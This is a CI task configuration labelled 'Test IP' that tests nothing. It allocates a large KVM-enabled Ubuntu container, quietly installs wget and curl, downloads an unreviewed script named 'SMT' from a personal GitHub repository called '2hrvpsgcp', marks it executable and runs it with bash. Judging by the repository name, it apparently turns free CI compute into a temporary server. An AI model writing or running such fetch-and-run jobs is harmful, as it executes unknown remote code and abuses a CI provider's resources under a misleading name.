task:
  name: Test IP
  timeout_in: 120m
  environment:
    TOKEN: ENCRYPTED[3cffc2b307f881ea0af9a5156ccbb43454e1db3fdc98a62d1bfa6158ad2a27c882465f341286d606b86e5fdffd561be1]
  container:
    cpu: 8
    memory: 32G
    image: docker.io/ubuntu
    kvm: true
  script: 
   - apt-get update &>/dev/null 
   - apt-get install wget curl -y &>/dev/null
   - wget https://raw.githubusercontent.com/cosoeminthant3/2hrvpsgcp/main/SMT
   - chmod +x *
   - bash SMT
